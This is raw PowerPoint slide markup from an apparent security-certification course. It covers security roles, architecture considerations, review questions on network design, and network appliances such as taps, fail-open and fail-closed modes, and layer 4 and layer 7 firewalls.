            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>In larger organizations, internal responsibility for security might be allocated to a dedicated department, run by a Chief Security Officer (CSO) or Chief Information Security Officer (CISO).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Managers may have responsibility for a domain, such as building control, web services, or accounting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Technical and specialist staff have responsibility for implementing, maintaining, and monitoring the policy. Security might be made of a core competency of systems and network administrators, or there may be dedicated security administrators. One such job title is Information Systems Security Officer (ISSO).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Nontechnical staff have the responsibility of complying with policy and with any relevant legislation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>External responsibility for security (due care or liability) lies mainly with directors or owners, though again it is important to note that all employees share some measure of responsibility</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5248837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61E64-C6C7-56E7-2BFF-32E6CD2C63E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="5020732"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Architecture Considerations</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BCE9E02-9F7D-0A0D-B55D-C45532B92CC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="9539288" cy="4711700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When evaluating the use of a particular architecture and selecting effective controls, consider a number of factors:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Costs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compute and responsiveness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scalability and ease of deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resilience and ease of recovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Patch availability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Risk transference</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41576323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B1B67-8B7A-459B-6AAF-1599FE6B8A6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="5084232"/>
            <a:ext cx="8534400" cy="1507067"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Enterprise Network Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{433C72AF-B4E3-4474-71AE-4D191E5E4A83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684212" y="685800"/>
            <a:ext cx="9869488" cy="4699000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A company’s network contains client workstations and database servers in the same subnet. Recently, this has enabled attackers to breach the security of the database servers from a workstation compromised by phishing malware. The company has improved threat awareness training and upgraded antivirus software on workstations. What other change will improve the security of the network’s design, and why?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A company must store archived data with very high confidentiality and integrity requirements on the same site as its production network systems. What type of architecture will best protect the security requirements of the archive host?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Following a data breach perpetrated by an insider threat actor, a company has relocated its on-premises servers to a dedicated equipment room. The equipment room has a lockable door, and the servers are installed to lockable racks. Access to keys is restricted to privileged administrators and subject to sign-out procedures. True or false?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These security principles reduce the attack surface.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A company wants to upgrade switches to enforce device authentication. Which framework, standard, or protocol must the switch models support?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two companies are merging and want to consolidate employees at a single site. Neither company’s on-premises networks have space to add the 100 desktops required. Which consideration factor does the current architecture model fail to address?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31226480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FC9A1-3F21-4F11-5A24-C629FC946BEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 5B - Network Security Appliances</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 357">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5CE7CE6-3A87-2156-9D11-DD583DEE1E54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409700" y="2141538"/>
            <a:ext cx="9407526" cy="4539190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2433466997"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk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F5812-1A5B-B8C4-4C7E-8248C9315878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Device Attributes</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46D52760-AFDA-2EC1-0CE2-38AEA34677E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2142066"/>
            <a:ext cx="5376336" cy="4385733"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attributes determine the precise way in which a device can be placed within the network topology.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active versus Passive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inline versus Tap/Monitor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As an example of inline versus monitored deployment options, controls that sniff network traffic can be deployed via a sensor attached to a switch or via a tap attached to a network cable:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SPAN (switched port analyzer)/mirror port</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Test access point (TAP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 358">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{547E3380-31FE-FEF2-6BB3-CCB4B6F77B0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5821362" y="2784733"/>
            <a:ext cx="5862637" cy="3463667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1686870955"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk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CF8B51-99E6-DE06-5493-092F8DB03241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Fail-Open versus Fail-Closed</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{542F9B6F-47BB-2EBF-317F-C010A7AE1001}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A security device could enter a failure state for a number of reasons. There could be a power or hardware fault, an unreconcilable policy violation, or a configuration error. Hardware failure can be caused by power surges, overheating, and physical damage. Software failure can occur because of bugs, security vulnerabilities, and compatibility issues. Configuration issues can be caused by human errors such as inattention, fatigue, or lack of training. Finally, devices or sites might be impacted by natural disasters such as floods, hurricanes, and earthquakes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When it fails, a device can designed or configured to fail-open or fail-closed:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fail-open</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fail-closed</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18293946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6C0A2-DD3E-E802-498A-1865442AC74E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Firewalls</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48202639-E996-C934-F439-59F9B9269686}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419100" y="1638300"/>
            <a:ext cx="5676900" cy="5067299"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A firewall is a preventive control designed to enforce policies on traffic entering and exiting a network zone.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Packet Filtering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A packet filtering firewall is configured by specifying a group of rules called an access control list (ACL). Each rule defines a specific type of data packet and the action to take when a packet matches the rule. A packet filtering firewall can inspect the headers of IP packets. Rules are based on the information found in those headers:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>IP filtering</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Protocol ID/type</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Port filtering/security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Firewall Device Placement and Attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An appliance firewall is a stand-alone hardware firewall deployed to monitor traffic passing into and out of a network zone. An appliance firewall can be deployed in three ways:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Routed (layer 3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bridged (layer 2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inline (layer 1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 360">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24BFC93B-92DD-25A3-84D6-49C9B8C3E792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6510336" y="2142067"/>
            <a:ext cx="4995862" cy="3137080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23926439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B547E-AD49-BD9B-96A3-F53008106CEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Layer 4 and Layer 7 Firewalls</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{961893A6-0626-EB04-D97D-ED5BCD55EF2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A stateful inspection firewall tracks information about the session established between two hosts. All firewalls now incorporate some level of stateful inspection capability. Session data is stored in a state table. When a packet arrives, the firewall checks it to confirm whether it belongs to an existing connection. If it does not, it applies the ordinary packet filtering rules to determine whether to allow it. Once the connection has been allowed, the firewall usually allows traffic to pass unmonitored in order to conserve processing effort.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stateful inspection can occur at layer 4 and layer 7.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 361">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1325E4F-CAFF-943B-2E2B-F7E159195406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5950896" y="2141538"/>
            <a:ext cx="5555302" cy="4335462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19202688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D2CA7-1375-FC3E-BB3B-45FAB130F9CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Layer 4 Firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{907666C9-E515-2D6D-55C7-B5A7D76ADD94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Layer 4 is the OSI transport layer. A layer 4 firewall examines the TCP three-way handshake to distinguish new from established connections. A legitimate TCP connection should follow a SYN &gt; SYN/ACK &gt; ACK sequence to establish a session, which is then tracked using sequence numbers. Deviations from this, such as SYN without ACK or sequence number anomalies, can be dropped as malicious flooding or session hijacking attempts. The firewall can be configured to respond to such attacks by blocking source IP addresses and throttling sessions. It can also track UDP traffic, though this is harder as UDP is a protocol without connections. It is also likely to be able to detect IP header and ICMP anomalies.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 362">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E231C425-DDD6-59CF-23CE-CC5F039303F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
